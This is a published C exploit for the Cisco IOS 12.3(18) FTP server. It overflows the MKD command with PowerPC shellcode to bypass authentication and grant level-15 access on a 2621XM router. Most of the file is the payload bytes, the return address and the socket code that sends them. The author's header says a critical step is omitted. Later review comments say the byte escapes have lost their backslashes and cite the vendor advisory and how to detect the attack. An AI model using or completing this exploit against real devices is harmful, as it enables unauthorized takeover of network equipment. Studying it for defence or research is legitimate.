
# Title : Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
# Published : 2008-07-29
# Author : Andy Davis


/*

 Cisco IOS FTP server remote exploit by Andy Davis 2008               
                                                                      
 Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007               
                                                                      
 Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router    
                                                                      
 Removes the requirement to authenticate and escalates to level 15    
                                                                      
 *********************************************************************
 To protect the innocent a critical step has been omitted, which means
 the shellcode will only execute when the router is attached to gdb.  
 I'm sure the PowerPC shellcoders out there will work it out...       
 *********************************************************************
                                                                      
 Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
 on the original IOS security research                                
                                                                      
 iosftpexploit <at> googlemail 'dot' com                              

*/

#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>

#define PORT 21

/*
 * Entry point.  Builds one FTP "MKD" command whose argument is a PowerPC
 * payload followed by padding and a return address, connects to argv[1]
 * on port 21 (PORT above) and sends it once.  Exits with -1 on bad usage
 * and 1 when send() returns 0; otherwise falls off the end of main, which
 * C99 and later treat as returning 0.
 *
 * NOTE(review): in this copy every byte escape reads "x3c" rather than
 * "\x3c" and every newline reads "n" rather than "\n" -- the backslashes
 * look stripped by whatever rendered the page.  As literally written,
 * sendbuf is plain ASCII text and the printf calls print a literal "n".
 *
 * NOTE(review): inet_addr() and htons() are declared in <arpa/inet.h>,
 * which the include list above does not contain; the build relies on it
 * arriving transitively through <netinet/in.h>.
 *
 * Defensive context: the vendor advisory named in the file header
 * (cisco-sa-20070509-iosftp) covers this IOS FTP-server bug, and the fix
 * is the updated release it lists.  On the wire this is a single FTP MKD
 * command whose argument carries raw machine-code bytes instead of a
 * directory name, which an FTP-aware IDS can alert on directly.
 */
int main(int argc, char **argv)
{
/* Everything sent to the server, built as one string literal.  The
 * trailing NUL of the literal is dropped by sizeof(sendbuf)-1 at send(). */
unsigned char sendbuf[] =

"MKD "

/* .equ vty_info, 0x8182da60    # pointer to VTY info */
/* .equ terminate, 0x80e4086c   # kill a process */

/* Payload: hard-coded for the IOS image / platform named in the file
 * header; the addresses below are specific to that build. */
"x3cx80x81x83"      /* lis     4,vty_info@ha */
"x38x84xdax60"      /* la      4,vty_info@l(4) */
"x7dx08x42x78"      /* xor     8,8,8 */
"x7cxe4x40x2e"      /* lwzx    7,4,8 */
"x91x07x01x74"      /* stw     8,372(7) */
"x39x08xffxff"      /* subi    8,8,1 */
"x38xe7x09x1a"      /* addi    7,7,233 */
"x91x07x04xca"      /* stw     8,1226(7) */
"x7dx03x43x78"      /* mr      3,8 */
"x3cx80x80xe4"      /* lis     4,terminate@ha */
"x38x84x08x6c"      /* la      4,terminate@l(4) */
"x7cx89x03xa6"      /* mtctr   4 */
"x4ex80x04x20"      /* bctr    */

/* exits cleanly without adversely affecting the FTP server */

/* Six words of filler between the payload and the saved return address. */
"x61x61x61x61"      /* padding */
"x61x61x61x61"      /* padding */
"x61x61x61x61"      /* padding */
"x61x61x61x61"      /* padding */
"x61x61x61x61"      /* padding */
"x61x61x61x61"      /* padding */

"x80x06x23xB8"      /* return address */
"x0dx0a";           /* CRLF terminating the FTP command line */

/* trampoline code */
/* when the overflow occurs r26+0x14 points to the shellcode */
/*
0x800623B8      lwz     26, 20(26)
0x800623BC      mtctr   26
0x800623C0      mr      3, 27
0x800623C4      bctrl
*/

unsigned char recvbuf[256];  /* server reply; read once below, never inspected */
struct sockaddr_in servaddr; /* only family/addr/port are set; sin_zero is left uninitialised */
int s;                       /* TCP socket to the target */

/* Usage check: exactly one argument, the target address.  exit(-1) is
 * reported to the shell as status 255 on POSIX systems. */
if (argc != 2)
        {
        printf ("nCisco IOS FTP server remote exploit by Andy Davis 2008n");

        printf ("nUsage: %s <target IP address>n",argv[0]);
        exit(-1);
        }

servaddr.sin_family = AF_INET;
/* inet_addr() returns INADDR_NONE for a malformed address; not checked here */
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT);

/* NOTE(review): neither socket() nor connect() is checked (both return -1
 * on failure), so a refused or unreachable target is only noticed, if at
 * all, when send() below fails. */
s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("nCisco IOS FTP server remote exploit by Andy Davis 2008n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM routernn");
printf ("Sending exploit...nn");

/* NOTE(review): send() signals failure with -1, not 0, so this branch
 * only fires on a zero-length send; a failed send falls straight through
 * to the recv() below.  The -1 excludes the literal's trailing NUL. */
if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
        {
        printf("Error sending packet...quittingnn");
        exit (1);
        }
/* Reply is discarded: return value unchecked, recvbuf never NUL-terminated
 * or printed.  The socket is never closed; the OS reclaims it on exit. */
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...nn");
}
